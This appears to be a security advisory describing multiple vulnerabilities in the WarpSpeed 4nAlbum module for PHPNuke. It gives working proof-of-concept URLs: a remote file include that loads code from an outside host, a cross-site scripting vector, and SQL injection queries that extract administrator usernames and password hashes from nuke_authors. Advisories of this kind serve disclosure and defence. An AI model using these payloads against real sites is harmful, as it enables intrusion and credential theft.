|
WarpSpeed 4nAlbum Module For PHPNuke Multiple Vulnerabilities
The following proof of concept was provided: To leverage the remote file include: http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/ Where the attacker would have to have malicious code in the script 'http://www.example.net/public/imageFunctions.php' To leverage the cross-site scripting issue: http://www.example.com/phpNukeDirectory/modules/4nalbum/public/nmimage.php?z=[xss code here] To leverage the SQL injection issue: http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/* http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/* |
|
|
Privacy Statement |